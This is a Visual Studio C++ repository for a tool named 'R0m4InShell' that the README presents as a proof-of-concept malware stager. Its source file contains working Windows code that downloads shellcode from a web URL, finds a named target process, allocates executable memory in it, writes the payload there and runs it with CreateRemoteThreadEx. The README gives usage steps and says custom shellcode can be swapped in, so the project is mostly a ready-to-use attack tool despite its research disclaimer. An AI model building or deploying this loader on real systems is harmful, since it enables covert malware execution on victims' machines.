├── MalwareStaging
├── MalwareStaging.vcxproj.filters
├── MalwareStaging.cpp
└── MalwareStaging.vcxproj
├── MalwareStaging.sln
├── .gitattributes
├── README.md
└── .gitignore
/MalwareStaging/MalwareStaging.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 |
--------------------------------------------------------------------------------
/MalwareStaging.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio Version 17
4 | VisualStudioVersion = 17.10.35004.147
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "MalwareStaging", "MalwareStaging\MalwareStaging.vcxproj", "{F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}"
7 | EndProject
8 | Global
9 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | Debug|x64 = Debug|x64
11 | Debug|x86 = Debug|x86
12 | Release|x64 = Release|x64
13 | Release|x86 = Release|x86
14 | EndGlobalSection
15 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x64.ActiveCfg = Debug|x64
17 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x64.Build.0 = Debug|x64
18 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x86.ActiveCfg = Debug|Win32
19 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Debug|x86.Build.0 = Debug|Win32
20 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x64.ActiveCfg = Release|x64
21 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x64.Build.0 = Release|x64
22 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x86.ActiveCfg = Release|Win32
23 | {F1FCC80C-E16B-4B67-8CB6-85B919BDF7E4}.Release|x86.Build.0 = Release|Win32
24 | EndGlobalSection
25 | GlobalSection(SolutionProperties) = preSolution
26 | HideSolutionNode = FALSE
27 | EndGlobalSection
28 | GlobalSection(ExtensibilityGlobals) = postSolution
29 | SolutionGuid = {90172BDC-0B23-4F31-A8A0-C075D88EACE2}
30 | EndGlobalSection
31 | EndGlobal
32 |
--------------------------------------------------------------------------------
/.gitattributes:
--------------------------------------------------------------------------------
1 | ###############################################################################
2 | # Set default behavior to automatically normalize line endings.
3 | ###############################################################################
4 | * text=auto
5 |
6 | ###############################################################################
7 | # Set default behavior for command prompt diff.
8 | #
9 | # This is need for earlier builds of msysgit that does not have it on by
10 | # default for csharp files.
11 | # Note: This is only used by command line
12 | ###############################################################################
13 | #*.cs diff=csharp
14 |
15 | ###############################################################################
16 | # Set the merge driver for project and solution files
17 | #
18 | # Merging from the command prompt will add diff markers to the files if there
19 | # are conflicts (Merging from VS is not affected by the settings below, in VS
20 | # the diff markers are never inserted). Diff markers may cause the following
21 | # file extensions to fail to load in VS. An alternative would be to treat
22 | # these files as binary and thus will always conflict and require user
23 | # intervention with every merge. To do so, just uncomment the entries below
24 | ###############################################################################
25 | #*.sln merge=binary
26 | #*.csproj merge=binary
27 | #*.vbproj merge=binary
28 | #*.vcxproj merge=binary
29 | #*.vcproj merge=binary
30 | #*.dbproj merge=binary
31 | #*.fsproj merge=binary
32 | #*.lsproj merge=binary
33 | #*.wixproj merge=binary
34 | #*.modelproj merge=binary
35 | #*.sqlproj merge=binary
36 | #*.wwaproj merge=binary
37 |
38 | ###############################################################################
39 | # behavior for image files
40 | #
41 | # image files are treated as binary by default.
42 | ###############################################################################
43 | #*.jpg binary
44 | #*.png binary
45 | #*.gif binary
46 |
47 | ###############################################################################
48 | # diff behavior for common document formats
49 | #
50 | # Convert binary document formats to text before diffing them. This feature
51 | # is only available from the command line. Turn it on by uncommenting the
52 | # entries below.
53 | ###############################################################################
54 | #*.doc diff=astextplain
55 | #*.DOC diff=astextplain
56 | #*.docx diff=astextplain
57 | #*.DOCX diff=astextplain
58 | #*.dot diff=astextplain
59 | #*.DOT diff=astextplain
60 | #*.pdf diff=astextplain
61 | #*.PDF diff=astextplain
62 | #*.rtf diff=astextplain
63 | #*.RTF diff=astextplain
64 |
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | # MalwareStaging
2 | ### Overview
3 | **R0m4InShell** is a proof-of-concept (PoC) project showcasing a malware staging website. It demonstrates how to download and inject a malicious payload (shellcode) into a target process on a remote system. The tool connects to a web server to retrieve the staged shellcode, injects it into the target process, and executes it.
4 |
5 | This project highlights the techniques used in malware delivery and execution, including process injection and remote thread creation. It is intended for research, education, and security testing purposes.
6 |
7 | ### Features
8 | - **Shellcode Staging**: Retrieves the shellcode from a remote URL.
9 | - **Process Injection**: Injects shellcode into a running process using `CreateRemoteThread`.
10 | - **Remote Payload Execution**: Executes the downloaded shellcode within the context of the injected process.
11 | - **Detailed Logging**: Logs each step of the process from URL connection, downloading shellcode, process enumeration, and injection.
12 |
13 | ### Usage
14 | 1. **Configure Web Server**: Host the shellcode on a web server.
15 | 2. **Run the Tool**: Execute the binary with the target process name as an argument:
16 | ```
17 | R0m4InShell.exe
18 | ```
19 | Example:
20 | ```
21 | R0m4InShell.exe notepad.exe
22 | ```
23 | 3. **Monitor** the console output for detailed logs, including the shellcode download, process handling, and remote thread creation.
24 |
25 | ### How It Works
26 | 1. The tool establishes a connection to a remote web server and downloads a staged shellcode.
27 | 2. It then enumerates running processes to find the specified target.
28 | 3. Once the process is found, the tool allocates memory in the target process and writes the shellcode into it.
29 | 4. Finally, the shellcode is executed by creating a remote thread in the target process.
30 |
31 | ### Example Shellcode
32 | The provided shellcode is a demonstration payload, but the tool can be adapted to use custom shellcodes for various purposes.
33 |
34 | ### Prerequisites
35 | - Windows operating system.
36 | - Visual Studio or any compatible C/C++ compiler.
37 | - A web server hosting the shellcode.
38 |
39 | ### Disclaimer
40 | This project is for educational and research purposes only. It should only be used in controlled environments, and the author does not endorse or encourage any illegal activities.
41 |
42 | ---
43 |
44 | ### Example Output
45 | ```
46 | Connection has been established.
47 | URL has been opened.
48 | Downloaded 600 bytes.
49 | Checking process: notepad.exe
50 | Great! We found the process: notepad.exe with PID: 1234
51 | Allocated 600-bytes with PAGE_EXECUTE_READWRITE permissions inside 1234
52 | Wrote 600-bytes to process memory
53 | We got handle on the Thread 5678 ----------0x000000000000
54 | Waiting for thread to finish...
55 | Thread finished executing.
56 | ```
57 |
58 | ---
59 |
--------------------------------------------------------------------------------
/MalwareStaging/MalwareStaging.cpp:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 | #include
5 | #include
6 | #include
7 |
8 |
9 | // Some macros to help in the process of writing and printing texts
10 | #define okay(msg, ...) printf("[+]" msg "\n", __VA_ARGS__)
11 | #define info(msg, ...) printf("[+]" msg "\n", __VA_ARGS__)
12 | #define warning(msg, ...) printf("[-]" msg "\n", __VA_ARGS__)
13 |
14 |
15 |
16 | PROCESSENTRY32 Proc;
17 | HANDLE hProcess, hThread = NULL;
18 | PBYTE pBytes = NULL;
19 | DWORD dwBytesRead;
20 |
21 | // Function to download shellcode from a URL
22 | PBYTE downloadShellcode(const wchar_t* url, DWORD* shellcodeSize) {
23 | HINTERNET hInternet = InternetOpenW(L"Shellcode Downloader", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, NULL);
24 | if (!hInternet) {
25 | printf("We can't connect to the Internet error: %lx\n", GetLastError());
26 | return NULL;
27 | }
28 | printf("Connection has been established.\n");
29 |
30 | HINTERNET hUrl = InternetOpenUrlW(hInternet, url, NULL, 0, INTERNET_FLAG_HYPERLINK | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, 0);
31 | if (!hUrl) {
32 | printf("We can't open the URL error: %lx\n", GetLastError());
33 | InternetCloseHandle(hInternet);
34 | return NULL;
35 | }
36 | printf("URL has been opened.\n");
37 |
38 | // Allocate memory for shellcode (600 bytes for example)
39 | pBytes = (PBYTE)LocalAlloc(LPTR, 600);
40 | if (!pBytes) {
41 | printf("Memory allocation failed.\n");
42 | InternetCloseHandle(hUrl);
43 | InternetCloseHandle(hInternet);
44 | return NULL;
45 | }
46 |
47 | if (!InternetReadFile(hUrl, pBytes, 600, shellcodeSize)) {
48 | printf("Error reading file: %lx\n", GetLastError());
49 | LocalFree(pBytes);
50 | InternetCloseHandle(hUrl);
51 | InternetCloseHandle(hInternet);
52 | return NULL;
53 | }
54 |
55 | printf("Downloaded %lu bytes.\n", *shellcodeSize);
56 | InternetCloseHandle(hUrl);
57 | InternetCloseHandle(hInternet);
58 | return pBytes;
59 | }
60 |
61 | int main(int argc, char* argv[]) {
62 | if (argc < 2) {
63 | warning("You must enter the process name to inject the shellcode!\nUSAGE: R0m4.exe ");
64 | return EXIT_FAILURE;
65 | }
66 |
67 | DWORD PID, TID = NULL;
68 | WCHAR target[MAX_PATH];
69 | size_t convertedChars = 0;
70 | mbstowcs_s(&convertedChars, target, MAX_PATH, argv[1], _TRUNCATE);
71 |
72 | // Step 1: Download the shellcode from a remote URL
73 | DWORD shellcodeSize = 0;
74 | PBYTE shellcode = downloadShellcode(L"http://127.0.0.1:8000/calc.bin", &shellcodeSize);
75 | if (!shellcode) {
76 | warning("Failed to download shellcode.\n");
77 | return EXIT_FAILURE;
78 | }
79 |
80 |
81 | for (DWORD i = 0; i < dwBytesRead; i++) {
82 | printf("%02X ", pBytes[i]);
83 | if ((i + 1) % 16 == 0) printf("\n"); // Print 16 bytes per line for readability
84 | }
85 |
86 |
87 | // Step 2: Find the target process
88 | HANDLE hSnapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
89 | if (hSnapshot == INVALID_HANDLE_VALUE) {
90 | LocalFree(shellcode);
91 | return 1;
92 | }
93 | Proc.dwSize = sizeof(PROCESSENTRY32);
94 |
95 | if (!Process32First(hSnapshot, &Proc)) {
96 | LocalFree(shellcode);
97 | CloseHandle(hSnapshot);
98 | return 1;
99 | }
100 |
101 | do {
102 | printf("Checking process: %ls\n", Proc.szExeFile);
103 | if (wcscmp(Proc.szExeFile, target) == 0) {
104 | PID = Proc.th32ProcessID;
105 | okay("Found the process: %ls with PID: %ld\n", target, PID);
106 | break;
107 | }
108 | } while (Process32Next(hSnapshot, &Proc));
109 |
110 | CloseHandle(hSnapshot);
111 |
112 | if (!PID) {
113 | warning("Target process not found.\n");
114 | LocalFree(shellcode);
115 | return EXIT_FAILURE;
116 | }
117 |
118 | // Step 3: Open the target process
119 | info("Attempting to open process with ID: %ld\n", PID);
120 | hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, PID);
121 | if (hProcess == NULL) {
122 | warning("Unable to open process with PID %ld. Error: %ld\n", PID, GetLastError());
123 | LocalFree(shellcode);
124 | return EXIT_FAILURE;
125 | }
126 |
127 | info("Successfully opened the process.\n");
128 |
129 | // Step 4: Allocate memory in the target process
130 | LPVOID rBuffer = VirtualAllocEx(hProcess, NULL, shellcodeSize, (MEM_COMMIT | MEM_RESERVE), PAGE_EXECUTE_READWRITE);
131 | if (!rBuffer) {
132 | warning("Memory allocation failed in target process.\n");
133 | CloseHandle(hProcess);
134 | LocalFree(shellcode);
135 | return EXIT_FAILURE;
136 | }
137 | info("Allocated %lu bytes with PAGE_EXECUTE_READWRITE in process %ld\n", shellcodeSize, PID);
138 |
139 | // Step 5: Write shellcode into the target process
140 | WriteProcessMemory(hProcess, rBuffer, shellcode, shellcodeSize, NULL);
141 | info("Wrote %lu bytes to process memory.\n", shellcodeSize);
142 |
143 | // Step 6: Create remote thread in the target process
144 | hThread = CreateRemoteThreadEx(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)rBuffer, NULL, 0, 0, &TID);
145 | if (!hThread) {
146 | warning("Unable to create remote thread in process with PID %ld. Error: %ld\n", PID, GetLastError());
147 | VirtualFreeEx(hProcess, rBuffer, 0, MEM_RELEASE);
148 | CloseHandle(hProcess);
149 | LocalFree(shellcode);
150 | return EXIT_FAILURE;
151 | }
152 | okay("Created remote thread %ld (0x%p) in process.\n", TID, hThread);
153 |
154 | // Step 7: Wait for the thread to finish and clean up
155 | WaitForSingleObject(hThread, INFINITE);
156 | info("Thread finished executing.\n");
157 |
158 | // Cleanup
159 | CloseHandle(hThread);
160 | CloseHandle(hProcess);
161 | LocalFree(shellcode);
162 |
163 | info("Process finished. See you next time!\n");
164 | return EXIT_SUCCESS;
165 | }
166 |
--------------------------------------------------------------------------------
/MalwareStaging/MalwareStaging.vcxproj:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | Debug
6 | Win32
7 |
8 |
9 | Release
10 | Win32
11 |
12 |
13 | Debug
14 | x64
15 |
16 |
17 | Release
18 | x64
19 |
20 |
21 |
22 |
23 |
24 |
25 |
26 | 17.0
27 | Win32Proj
28 | {f1fcc80c-e16b-4b67-8cb6-85b919bdf7e4}
29 | MalwareStaging
30 | 10.0
31 |
32 |
33 |
34 | Application
35 | true
36 | v143
37 | Unicode
38 |
39 |
40 | Application
41 | false
42 | v143
43 | true
44 | Unicode
45 |
46 |
47 | Application
48 | true
49 | v143
50 | Unicode
51 |
52 |
53 | Application
54 | false
55 | v143
56 | true
57 | Unicode
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
70 |
71 |
72 |
73 |
74 |
75 |
76 |
77 |
78 |
79 | Level3
80 | true
81 | WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)
82 | true
83 |
84 |
85 | Console
86 | true
87 |
88 |
89 |
90 |
91 | Level3
92 | true
93 | true
94 | true
95 | WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
96 | true
97 |
98 |
99 | Console
100 | true
101 | true
102 | true
103 |
104 |
105 |
106 |
107 | Level3
108 | true
109 | _DEBUG;_CONSOLE;%(PreprocessorDefinitions)
110 | true
111 |
112 |
113 | Console
114 | true
115 | $(CoreLibraryDependencies);%(AdditionalDependencies);wininet.lib
116 |
117 |
118 |
119 |
120 | Level3
121 | true
122 | true
123 | true
124 | NDEBUG;_CONSOLE;%(PreprocessorDefinitions)
125 | true
126 |
127 |
128 | Console
129 | true
130 | true
131 | true
132 |
133 |
134 |
135 |
136 |
137 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | ## Ignore Visual Studio temporary files, build results, and
2 | ## files generated by popular Visual Studio add-ons.
3 | ##
4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
5 |
6 | # User-specific files
7 | *.rsuser
8 | *.suo
9 | *.user
10 | *.userosscache
11 | *.sln.docstates
12 |
13 | # User-specific files (MonoDevelop/Xamarin Studio)
14 | *.userprefs
15 |
16 | # Mono auto generated files
17 | mono_crash.*
18 |
19 | # Build results
20 | [Dd]ebug/
21 | [Dd]ebugPublic/
22 | [Rr]elease/
23 | [Rr]eleases/
24 | x64/
25 | x86/
26 | [Ww][Ii][Nn]32/
27 | [Aa][Rr][Mm]/
28 | [Aa][Rr][Mm]64/
29 | bld/
30 | [Bb]in/
31 | [Oo]bj/
32 | [Oo]ut/
33 | [Ll]og/
34 | [Ll]ogs/
35 |
36 | # Visual Studio 2015/2017 cache/options directory
37 | .vs/
38 | # Uncomment if you have tasks that create the project's static files in wwwroot
39 | #wwwroot/
40 |
41 | # Visual Studio 2017 auto generated files
42 | Generated\ Files/
43 |
44 | # MSTest test Results
45 | [Tt]est[Rr]esult*/
46 | [Bb]uild[Ll]og.*
47 |
48 | # NUnit
49 | *.VisualState.xml
50 | TestResult.xml
51 | nunit-*.xml
52 |
53 | # Build Results of an ATL Project
54 | [Dd]ebugPS/
55 | [Rr]eleasePS/
56 | dlldata.c
57 |
58 | # Benchmark Results
59 | BenchmarkDotNet.Artifacts/
60 |
61 | # .NET Core
62 | project.lock.json
63 | project.fragment.lock.json
64 | artifacts/
65 |
66 | # ASP.NET Scaffolding
67 | ScaffoldingReadMe.txt
68 |
69 | # StyleCop
70 | StyleCopReport.xml
71 |
72 | # Files built by Visual Studio
73 | *_i.c
74 | *_p.c
75 | *_h.h
76 | *.ilk
77 | *.meta
78 | *.obj
79 | *.iobj
80 | *.pch
81 | *.pdb
82 | *.ipdb
83 | *.pgc
84 | *.pgd
85 | *.rsp
86 | *.sbr
87 | *.tlb
88 | *.tli
89 | *.tlh
90 | *.tmp
91 | *.tmp_proj
92 | *_wpftmp.csproj
93 | *.log
94 | *.vspscc
95 | *.vssscc
96 | .builds
97 | *.pidb
98 | *.svclog
99 | *.scc
100 |
101 | # Chutzpah Test files
102 | _Chutzpah*
103 |
104 | # Visual C++ cache files
105 | ipch/
106 | *.aps
107 | *.ncb
108 | *.opendb
109 | *.opensdf
110 | *.sdf
111 | *.cachefile
112 | *.VC.db
113 | *.VC.VC.opendb
114 |
115 | # Visual Studio profiler
116 | *.psess
117 | *.vsp
118 | *.vspx
119 | *.sap
120 |
121 | # Visual Studio Trace Files
122 | *.e2e
123 |
124 | # TFS 2012 Local Workspace
125 | $tf/
126 |
127 | # Guidance Automation Toolkit
128 | *.gpState
129 |
130 | # ReSharper is a .NET coding add-in
131 | _ReSharper*/
132 | *.[Rr]e[Ss]harper
133 | *.DotSettings.user
134 |
135 | # TeamCity is a build add-in
136 | _TeamCity*
137 |
138 | # DotCover is a Code Coverage Tool
139 | *.dotCover
140 |
141 | # AxoCover is a Code Coverage Tool
142 | .axoCover/*
143 | !.axoCover/settings.json
144 |
145 | # Coverlet is a free, cross platform Code Coverage Tool
146 | coverage*.json
147 | coverage*.xml
148 | coverage*.info
149 |
150 | # Visual Studio code coverage results
151 | *.coverage
152 | *.coveragexml
153 |
154 | # NCrunch
155 | _NCrunch_*
156 | .*crunch*.local.xml
157 | nCrunchTemp_*
158 |
159 | # MightyMoose
160 | *.mm.*
161 | AutoTest.Net/
162 |
163 | # Web workbench (sass)
164 | .sass-cache/
165 |
166 | # Installshield output folder
167 | [Ee]xpress/
168 |
169 | # DocProject is a documentation generator add-in
170 | DocProject/buildhelp/
171 | DocProject/Help/*.HxT
172 | DocProject/Help/*.HxC
173 | DocProject/Help/*.hhc
174 | DocProject/Help/*.hhk
175 | DocProject/Help/*.hhp
176 | DocProject/Help/Html2
177 | DocProject/Help/html
178 |
179 | # Click-Once directory
180 | publish/
181 |
182 | # Publish Web Output
183 | *.[Pp]ublish.xml
184 | *.azurePubxml
185 | # Note: Comment the next line if you want to checkin your web deploy settings,
186 | # but database connection strings (with potential passwords) will be unencrypted
187 | *.pubxml
188 | *.publishproj
189 |
190 | # Microsoft Azure Web App publish settings. Comment the next line if you want to
191 | # checkin your Azure Web App publish settings, but sensitive information contained
192 | # in these scripts will be unencrypted
193 | PublishScripts/
194 |
195 | # NuGet Packages
196 | *.nupkg
197 | # NuGet Symbol Packages
198 | *.snupkg
199 | # The packages folder can be ignored because of Package Restore
200 | **/[Pp]ackages/*
201 | # except build/, which is used as an MSBuild target.
202 | !**/[Pp]ackages/build/
203 | # Uncomment if necessary however generally it will be regenerated when needed
204 | #!**/[Pp]ackages/repositories.config
205 | # NuGet v3's project.json files produces more ignorable files
206 | *.nuget.props
207 | *.nuget.targets
208 |
209 | # Microsoft Azure Build Output
210 | csx/
211 | *.build.csdef
212 |
213 | # Microsoft Azure Emulator
214 | ecf/
215 | rcf/
216 |
217 | # Windows Store app package directories and files
218 | AppPackages/
219 | BundleArtifacts/
220 | Package.StoreAssociation.xml
221 | _pkginfo.txt
222 | *.appx
223 | *.appxbundle
224 | *.appxupload
225 |
226 | # Visual Studio cache files
227 | # files ending in .cache can be ignored
228 | *.[Cc]ache
229 | # but keep track of directories ending in .cache
230 | !?*.[Cc]ache/
231 |
232 | # Others
233 | ClientBin/
234 | ~$*
235 | *~
236 | *.dbmdl
237 | *.dbproj.schemaview
238 | *.jfm
239 | *.pfx
240 | *.publishsettings
241 | orleans.codegen.cs
242 |
243 | # Including strong name files can present a security risk
244 | # (https://github.com/github/gitignore/pull/2483#issue-259490424)
245 | #*.snk
246 |
247 | # Since there are multiple workflows, uncomment next line to ignore bower_components
248 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
249 | #bower_components/
250 |
251 | # RIA/Silverlight projects
252 | Generated_Code/
253 |
254 | # Backup & report files from converting an old project file
255 | # to a newer Visual Studio version. Backup files are not needed,
256 | # because we have git ;-)
257 | _UpgradeReport_Files/
258 | Backup*/
259 | UpgradeLog*.XML
260 | UpgradeLog*.htm
261 | ServiceFabricBackup/
262 | *.rptproj.bak
263 |
264 | # SQL Server files
265 | *.mdf
266 | *.ldf
267 | *.ndf
268 |
269 | # Business Intelligence projects
270 | *.rdl.data
271 | *.bim.layout
272 | *.bim_*.settings
273 | *.rptproj.rsuser
274 | *- [Bb]ackup.rdl
275 | *- [Bb]ackup ([0-9]).rdl
276 | *- [Bb]ackup ([0-9][0-9]).rdl
277 |
278 | # Microsoft Fakes
279 | FakesAssemblies/
280 |
281 | # GhostDoc plugin setting file
282 | *.GhostDoc.xml
283 |
284 | # Node.js Tools for Visual Studio
285 | .ntvs_analysis.dat
286 | node_modules/
287 |
288 | # Visual Studio 6 build log
289 | *.plg
290 |
291 | # Visual Studio 6 workspace options file
292 | *.opt
293 |
294 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
295 | *.vbw
296 |
297 | # Visual Studio LightSwitch build output
298 | **/*.HTMLClient/GeneratedArtifacts
299 | **/*.DesktopClient/GeneratedArtifacts
300 | **/*.DesktopClient/ModelManifest.xml
301 | **/*.Server/GeneratedArtifacts
302 | **/*.Server/ModelManifest.xml
303 | _Pvt_Extensions
304 |
305 | # Paket dependency manager
306 | .paket/paket.exe
307 | paket-files/
308 |
309 | # FAKE - F# Make
310 | .fake/
311 |
312 | # CodeRush personal settings
313 | .cr/personal
314 |
315 | # Python Tools for Visual Studio (PTVS)
316 | __pycache__/
317 | *.pyc
318 |
319 | # Cake - Uncomment if you are using it
320 | # tools/**
321 | # !tools/packages.config
322 |
323 | # Tabs Studio
324 | *.tss
325 |
326 | # Telerik's JustMock configuration file
327 | *.jmconfig
328 |
329 | # BizTalk build output
330 | *.btp.cs
331 | *.btm.cs
332 | *.odx.cs
333 | *.xsd.cs
334 |
335 | # OpenCover UI analysis results
336 | OpenCover/
337 |
338 | # Azure Stream Analytics local run output
339 | ASALocalRun/
340 |
341 | # MSBuild Binary and Structured Log
342 | *.binlog
343 |
344 | # NVidia Nsight GPU debugger configuration file
345 | *.nvuser
346 |
347 | # MFractors (Xamarin productivity tool) working folder
348 | .mfractor/
349 |
350 | # Local History for Visual Studio
351 | .localhistory/
352 |
353 | # BeatPulse healthcheck temp database
354 | healthchecksdb
355 |
356 | # Backup folder for Package Reference Convert tool in Visual Studio 2017
357 | MigrationBackup/
358 |
359 | # Ionide (cross platform F# VS Code tools) working folder
360 | .ionide/
361 |
362 | # Fody - auto-generated XML schema
363 | FodyWeavers.xsd
--------------------------------------------------------------------------------